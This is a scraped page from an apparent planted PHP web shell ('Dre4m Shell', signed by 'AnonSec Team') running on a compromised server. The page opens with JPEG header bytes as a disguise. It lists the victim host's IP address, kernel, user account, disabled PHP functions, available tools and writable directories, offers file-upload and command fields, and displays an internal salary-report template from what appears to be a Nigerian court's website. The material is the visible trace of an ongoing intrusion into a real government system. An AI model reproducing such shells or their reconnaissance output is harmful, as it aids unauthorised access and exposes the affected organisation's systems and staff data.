ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.119.248.100
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/4de12d14d64737007a9fdf1ebe942c18f2b70b9f.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="images/favicon.ico">
<title>NATIONAL INDUSTRIAL COURT OF NIGERIA</title>
<link rel="stylesheet" href="<?php echo e(asset('assets/css/bootstrap.min.css')); ?>">
<style type="text/css">

body,td,th {
  font-size: 15px;
  font-family: Verdana, Geneva, sans-serif;
  margin:15px;
}
.tables tr td, .tables
{
padding:6px;
border:1px solid #333;
}
@media  print
{    
    .no-print, .no-print *
    {
        display: none !important;
    }
}

body {
  background-image: <?php echo e(asset('Images/nicn_bg.jpg')); ?>;
}
.style2 {color: #008000}

</style>
<style type="text/css">
.head-color tr td, .table .th-row td
{
//color:#06c;

}
.table, .table tr td
{
/* border: 1px solid #06C;
color:#06c; */
}
</style>
 <script type="text/javascript" src="<?php echo e(asset('assets/js/number_to_word.js')); ?>">
</script>
<body background="<?php echo e(asset('Images/nicn_bg.jpg')); ?>"  onload="lookup(); gross();">
  <div align="center">
    <strong>
      <br />
      <br />
      <br />
      NATIONAL INDUSTRIAL COURT OF NIGERIA<?php echo e(isset($divisionName) ?  ', '. strtoupper($divisionName) : ''); ?>

      <h4>SALARY PROJECTION FOR THE MONTH OF <?php echo e(isset($month) ? $month . ', ' : ''); ?> <?php echo e(isset($year) ? $year .'.' : ''); ?></h4>
    </strong>
  </div>
  <br />


  <?php
    $totalEmolument = 0.0;
    $totalPension = 0.0;
    $totalStaff = 0.0;
  ?>


  <div align="center">
      <table class="table table-condense table-responsive" border="1" align="center" cellpadding="0" cellspacing="0" id="tableData">
      <tr class="text-center">
        <td><strong>SN</strong></td>
        <td><strong>GRADE</strong></td>
        <td><strong>NO. OF STAFF</strong></td>
        <td><strong>TOTAL MONTHLY EMOLUMENT</strong></td>
      </tr>
    
      
      <?php if(isset($salary_detail) && $salary_detail): ?>
        <?php $__currentLoopData = $salary_detail; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$projection): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
          <tr class="text-center">
            <td><?php echo e(($key + 1)); ?></td>
            <td><?php echo e($projection->grade); ?></td>
            <td><?php $totalStaff += $projection->totalStaffNo; ?> <?php echo e($projection->totalStaffNo); ?></td>
            <td>
              <?php 
                $totalPension += $projection->totalMonthlyPEN; 
                $totalEmolument += $projection->totalMonthlyEmo; 
              ?> 
              <?php echo e(number_format($projection->totalMonthlyEmo, 2)); ?></td>
          </tr>
        
          <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
        <?php endif; ?>

      <tr class="text-center">
          <td colspan="2"><strong>Total</strong></td>
          <td><strong><?php echo e($totalStaff); ?></strong></td>
          <td><strong><?php echo e(number_format($totalEmolument, 2)); ?></strong></td>
      </tr>
        <tr border="0" class="no-print">
            <td colspan="4">
              <br />
            </td>
        </tr>

        <tr border="0" class="no-print">
          <td colspan="4">
            <div align="right">
              <div class="row">
                <div class="col-md-9">
                  <div style="font-weight: bolder; padding: 2px;">LESS R. S. A. = &#8358;<?php echo e(number_format($totalPension, 2)); ?></div>
                </div>
                <div class="col-md-9">
                  <div style="font-weight: bolder;  padding: 2px;"> SUB-TOTAL = &#8358;<?php echo e(number_format($totalEmolument - $totalPension, 2)); ?></div>
                </div>
                <div class="col-md-9">
                  <div style="font-weight: bolder;  padding: 2px;"> NET TOTAL = &#8358;<?php echo e(number_format($totalEmolument - $totalPension, 2)); ?></div>
                </div>
              </div>
            </div>
          </td>
        </tr>
      </table>
      
      <br />
      <div class="no-print" align="center">
        <input type="button" class="hidden-print" id="btnExport" value="Export to Excel" onclick="ExportToExcel('xlsx')" />    
      </div>
  </div>


  <div>
      <h2>  
        <a  class= "no-print" type="submit" class="btn btn-success btn-sm pull-right" href = "<?php echo e(url('/report/salary-projection')); ?>">Back</a>
      </h2>
  </div>

    <script src="<?php echo e(asset('assets/js/jQuery-2.2.0.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/table2excel.js')); ?>"></script>

      <script type="text/javascript">
        function ExportToExcel() {
          //$("#btnExport").hide();
            $("#tableData").table2excel({
                filename: "<?php echo e(isset($month) ? $month: ''); ?>_<?php echo e(isset($year) ? $year : ''); ?>_<?php echo e(isset($divisionName) ? $divisionName : ''); ?>_salary_projection.xls"
            });
            $("#tableData").excelexportjs({
              containerid: "tableData", datatype: 'table'
            });
            //$("#btnExport").show();
        }
      </script>

</body>
</html>
<?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/SalaryProjection/report.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team